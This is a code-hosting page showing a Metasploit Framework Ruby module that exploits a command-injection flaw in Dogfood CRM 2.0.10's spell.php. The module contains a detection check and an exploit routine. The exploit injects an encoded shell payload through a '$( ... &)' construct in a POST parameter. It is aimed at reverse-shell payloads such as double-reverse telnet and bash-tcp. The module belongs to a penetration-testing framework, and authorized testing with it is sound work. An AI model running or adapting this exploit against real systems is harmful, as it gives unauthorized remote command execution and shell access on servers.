CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Dogfood CRM spell.php Remote Command Execution',

14
      'Description'    => %q{

15
          This module exploits a previously unpublished vulnerability in the

16
        Dogfood CRM mail function which is vulnerable to command injection

17
        in the spell check feature.  Because of character restrictions, this

18
        exploit works best with the double-reverse telnet payload. This

19
        vulnerability was discovered by LSO and affects v2.0.10.

20
      },

21
      'Author'         =>

22
        [

23
          'LSO <lso[at]hushmail.com>', # Exploit module

24
          'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).

25
        ],

26
      'License'        => BSD_LICENSE,

27
      'References'     =>

28
        [

29
          [ 'OSVDB', '54707' ],

30
          [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],

31
        ],

32
      'Privileged'     => false,

33
      'Platform'       => ['unix'], # aushack - removed win, linux -> untested

34
      'Arch'           => ARCH_CMD,

35
      'Payload'        =>

36
        {

37
          'Space'       => 1024,

38
          'DisableNops' => true,

39
          'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install

40
          'Compat'      =>

41
            {

42
              'PayloadType' => 'cmd cmd_bash',

43
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',

44
            }

45
        },

46
      'Targets'        => [ ['Automatic', { }], ],

47
      'DefaultTarget'  => 0,

48
      'DisclosureDate' => '2009-03-03'

49
      ))

50


51
    register_options(

52
      [

53
        OptString.new('URIPATH',   [ true,  "The URI of the spell checker", '/dogfood/mail/spell.php']),

54
      ])

55


56
  end

57


58
  def check

59
    res = send_request_raw(

60
      {

61
        'uri' => normalize_uri(datastore['URIPATH']),

62
      }, 1)

63


64
    if (res and res.body =~ /Spell Check complete/)

65
      return Exploit::CheckCode::Detected

66
    end

67
    return Exploit::CheckCode::Safe

68
  end

69


70
  def exploit

71
    timeout = 1

72


73
    cmd = payload.encoded

74
    data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"

75
    uri = normalize_uri(datastore['URIPATH'])

76


77
    response = send_request_cgi(

78
      {

79
      'uri' => uri,

80
      'method' => "POST",

81
      'data' => data

82
      },

83
    timeout)

84


85
    handler

86
  end

87
end

88


89